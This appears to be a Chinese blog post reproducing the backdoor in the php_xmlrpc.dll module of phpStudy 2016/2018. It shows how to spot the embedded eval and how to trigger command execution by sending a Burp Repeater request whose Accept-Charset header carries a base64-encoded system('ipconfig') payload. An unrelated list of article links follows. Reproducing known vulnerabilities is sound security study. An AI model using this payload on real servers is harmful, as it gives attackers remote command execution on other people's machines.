phpstudy后门漏洞复现php5.2
2024-10-20 08:28:58
前段时间phpstudy被人发现某些版本存在后门,许多人就这样被当作肉鸡长达两年之久
后门隐藏在程序自带的php的php_xmlrpc.dll模块
影响的版本:phpstudy2016和2018
在H:\PhpStudy20180211\PHPTutorial\php\php-5.2.17\ext找到php_xmlrpc.dll
用notepad++打开,ctrl+f搜索eval
说明这个版本的phpstudy是由后门的
用firefox访问本地ip,用bp抓包,用ctrl+r送到repeater
找到accept-encoding,把逗号后面的空格删掉,deflate后面回车换行,加上accept-charset:c3lzdGVtKCdpcGNvbmZpZycpIDs=,然后go
(这是system(‘ipconfig’) ;的base64加密)
漏洞复现成功
加system(‘path’) ;(分号前面有空格)
安全问题不容小觑啊
最新文章
- Python实战 :2017国考职业表excel转数据库,再查询生成excel
- ML-线性回归
- IOS常见异常捕获
- oracle: job使用
- Android入门第八篇之GridView(九宫图)
- FreeSWITCH第三方库(音频)的简单介绍(一)
- hash_map map
- pfSense软路由防火墙
- 定义自己的布局RelativeLayout 绘制网格线
- Akka.NET是Java/Scala 流行框架Akka的一个 .NET 开源移植
- 为知笔记markdown插件安装
- dlopen函数详解
- 读《淘宝技术这十年》 总结下web架构的发展
- 微信终端开发团队:新年新语言,WCDB Swift
- NDk编译opencv for Android,并引用在Unity3d游戏中的一般步骤
- C++学习-6
- 使用getline输入一行字符串
- NumPy 学习笔记(三)
- bootstrap table 分页序号递增问题 (转)
- vue 下拉刷新 上拉加载(vue-scroller)